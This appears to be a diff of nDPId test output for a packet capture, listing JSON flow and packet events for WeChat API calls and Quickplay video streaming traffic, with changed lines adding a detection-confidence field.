{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":380,"pkt_l4_len":344,"ts_msec":1429000052348,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWw6SUAAPwb+3wo2qfrLzYFlpwkAUDA+6IKRcovGUBgAblluAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1iYXRjaGVtb2ppZG93bmxvYWQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiA0OQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCoZfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwC5BQICxN0BAmqbBe97kd9DUUv3xZ4Sxtk="}
-00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmbatchemojidownload","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
+00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmbatchemojidownload","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00994{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":461,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":461,"pkt_l4_len":425,"ts_msec":1429000052350,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAb2qTEAAPwZ4UAo2qfrLzZeg1mUAUE+SeI3XHwqaUBgAbsqdAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vZ2V0Y29udGFjdGxhYmVsbGlzdCBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDEzMA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNColfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwD\/BNABUsTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYeQoz6VrtJH00pu+gvbU58lmESj2o4D7TnERbmXXALCqM="}
-00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
+00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1429000052688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"ts_msec":1429000052688,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPWIBEAArAZEf8vNgWUKNqn6AFCnCZFyi8YwPunGUBgIIppgAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwC5BQwMAADES8+zVe2SBL6tUVxA2Vh6"}
 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1429000053611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"ts_msec":1429000053611,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYEAArQar6MvNl6AKNqn6AFDWZdcfCppPknoiUBgIIrzYAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"}
 02355{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1429000054555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"ts_msec":1429000054555,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaBrnEAArQYNK3gcIygKNqn6AFDLKctRyGZwAbOjUBAIIjnpAAC6eiaRjUv\/RPkOH82F5WosK669TTY41gIXUb5TM31DDCidAN9BA2XuM3HL8T4H8RaooiwzYVX\/NyYQvgJwozgBs+HWQERJo3j\/tFsg+NsbehQ2yqZ0ni5IF772nmOTUjjTqhvSyTYKL8LPX7\/SbJuUeesyVlCo1rcZrFyvobivL2QselZVKbZT9oXnVrTBXz9SgWOBGQjqM+6MYkHQqsKJwKvUzEiyfqsG7Y5ib\/HG3Cr61CWCOUzckjCo4x7\/2FXuS4bbTxyKoEXBeNcTCujBm4BW7TCl6yaZq2WXxGG4hvRF0Be\/m5kDX7D2ritov06P2eBHlozi8poVm+8iR+ps7ttJSDR9cRtIoZ6CzGQuMlpslQH3eGbKiA+TieQa5VKgPmn67A5ZHz6oVTfujJs8WKbjDDZ9Q0iRvNel4W1E1K\/\/zSVXoGcUMXf+jhnQwZpcpi1EdAnR+40BHozU+RTudhZL4Gple7Zf9xhKfQFyWOsUn76k3fkX1zxQlXwkMtX73RmtTyaB3L2pN7AlVM\/\/nWHu7EuLuT9DL9C5g0C9ndUmqL7NBsK0kAZZ78eDPfrNcCw\/ZFw2bNcbUFc\/DZYsLjg+otfm91LhV9Jp43mlKbIVnnDPmIDKMqjiCMwbTaSaZixrFny1uf5O00Y6dqEgtz9Pli4PyDpRhyoCvJu+i4H+d88Uaw2rkO46JoXyB7A5p5OjjhlkqrGyi1CwU0deobjNdyyDdV8jJ\/Pi9n3PsmZZgmuJXbUr3Wj33YeDG\/0Oj+2II0vRU4R2CMhv6eJcxCNdiNxlxN6WMj7SN4Xwx9cQTGloH0v9P+ZbhisAixQQx+c7VnS53a6eMHAGjtfp5Vfl\/a+fbz\/SS6+0wsbw43YigcJZdKwu\/J+7R2Vsvwwp\/\/0VJXCclXCvQKK9ZgSyMjcZXFFdVBYQ9ynX2PKUJbCiQo0ZSacbctiB0eo38ldIKG1HQXiG+IvrS8x51f+MHkxe\/Qz6gFVONzxqGI2AuPK799Gz1u48EzIlwqf+hfJ5+80+67LPm7OKnX\/+Hglw20t2bXScSU\/7a\/No7LXMZaiPPFjItOLkydDIZdblKbD9VzRcriDGIikYRE2vOO7ef0bABx9ekxq7Y6qOz8wz2bfi82kKdO6ZKos8mJ6Z5zMskbhz5TARjuFwb\/y0CNvNRI3ZzaCcWvcSerQm6YI5Qkh9hi+UFoCigmvOa40ltrSAgZJLwEzoigbbL\/Fux90aNws71lhYIk5rLapLHllGTYci4NeZq+lysN0NJeGSVgJjhywSjEcv98KS01SOoGP+L8hkrHHDndozayAIZx7KNatPdBhHierZx9hk7YaR2QyAaOf\/KGZ26mtXJD+fZ9qzzRf7VPOJIXRan6Mvh2X5ksvc+d2E+xpW4ZS3heqwr3GFyseSzu+SItPTkyOePTh5SBKlnurq4GBXzKzTiVp1gCObUjjb361kLXFDG8pv8RFHz9T71D1Nc2wSTzFugnvV1UNFiSfCUv5Hf3vreasQSxEc5M2HufON7Ls2Sq1av0HxiKW3cr3g1hTf6isQpBvLi2kzfVTuUfjZ4NfuituEBPk76dM0NGhwCE37DhDWyEA0CskC\/3LGpzpkwJVXZJneb4tZ6ZUUp9Tq8jwnKJrc9Xm0\/K+NOqhD9cfXeA0wPmIBqb\/50HOtK0ivaxJQrriFNfYzXGvwDWExqj3032B+UnoRZ9sdl+HDci1tJl2ZYTWQ\/jnW4QU+eyZsftpA1fidaKNXFUm98r6LCSgwEpKQko1ga3+vGDjVtQbFJqqZZSUhMiGE7JxSiWQR6m1VFOyrIP\/NGSlhQwEVU0AVlSc0flRUDOO1ef3Q8CCp+aj8TUh3wwIIfQUflA=="}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01205{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":616,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":616,"pkt_l4_len":580,"ts_msec":1429000054595,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAljROkAAPwZnAgo2qfrLzYFlpwoAUAw7AlWKyQifUBgAbo2ZAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vYW5kcm9pZGdjbXJlZyBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDI5MQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCo1fJgEAQVUr0H3fAhACF0hkbD5sDN+EgwDvBPUC9wHE3QEChNVx4ZIME2Cf+At3im0FbHQtQ5OeVwRjPIiyLiTcUNpigxgohLu4Sn2cUUhjM\/e6hatoyLaBnD1MiX1aSCFGHqc7sd1LbQ4Ji50\/nmut+cRtfu64v\/XpBgMs3P9k27B87PKWuZeRn0c7PoUNWA2a8JliIiEG\/iNlGYYh7Jh9YEWG\/gDJeOxQbfTuL3jKYttVpQbSW5W7M23rsRNXzMxlPjm7V+eiXogw4ZTrI0SYQBetGJTy4I9tf1xmHMyE6HsFYIlHFXzsGgJQf7uh78Qo0Kz+t0syWOECVQvp3s423G3nllPk9jmdcOLrj5HgsV0zUjYpYNBzzWvoRGUwiRoLkw=="}
-00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/androidgcmreg","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
+00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/androidgcmreg","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
 01045{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1429000054688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"ts_msec":1429000054688,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjvEAAPwaG4wo2qfp4HCMoyykAUHABs6PLUc5cUBgk\/ZRuAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="}
 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1429000054967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"ts_msec":1429000054967,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUEEkAArQbHccvNgWUKNqn6AFCnCorJCJ8MOwSFUBgII8UCAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDvBAYGAAAXudj2eCNNjv4Uv\/n42\/lx"}
 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1429000055158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"ts_msec":1429000055158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYkAArAas5svNl6AKNqn6AFDWZdcfCppPknoiUBkIIrzXAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"}
-01125{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1429000052217,"flow_last_seen":1429000090450,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":19212,"flow_avg_l4_payload_len":600,"midstream":1,"ts_msec":1429000090450,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
+01151{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1429000052217,"flow_last_seen":1429000090450,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":19212,"flow_avg_l4_payload_len":600,"midstream":1,"ts_msec":1429000090450,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01290{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":681,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":681,"pkt_l4_len":645,"ts_msec":1429000110390,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAApm620AAPwZqrgo2qfrLzZPXi1YAUBkYU+pems3wUBgAbqLPAABQT1NUIGh0dHA6Ly9oa21pbm9yc2hvcnQud2VpeGluLnFxLmNvbS9jZ2ktYmluL21pY3JvbXNnLWJpbi9ydGt2cmVwb3J0IEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMzU1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGttaW5vcnNob3J0LndlaXhpbi5xcS5jb20NClVzZXItQWdlbnQ6IE1pY3JvTWVzc2VuZ2VyIENsaWVudA0KDQqNXyYBAEFVK9B93wIQAhdIZGw+bAzfhIMAzAXaBLgCxN0BAsPj4k0n0ICdjYK52ViOWnOC4Vzgxi7+iegOsMW+oW6QdEAHg+UlyxaSBb9\/s0oeR4gum6gk+uWhqjv3Tkoz3jpOxZ3uqg5IoeAevVK78mE+75Mm5QEXaL\/24wa8I4nsiJTVEr54yg9WsIjA1I\/cd65YM57jS4+t1kJ\/xpqwwPsMfqK2G34N85Xo0uWP1F2PyLEjHiJZyK4xRu\/XYVzahdDn1vQRPtqQ3i2o6ggKNGN3kBkFa6C2GO0zTqwt7XUYqb0ppGq3KKIyPCtrTg5YICuEsfTDMTLer3J067M5VD93Ij+RkxqqGFN9+gvu+C\/smM0OksnEYsvtVnkr65ZF5Pk4qVPYHRDIlRcRHe0XzckIkJitYHFr8VSN2R6GxFfZK0YtMPQdmLxH6qLecheL3Cuuz7XcYpBc6JGpDIih+q4v"}
-00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
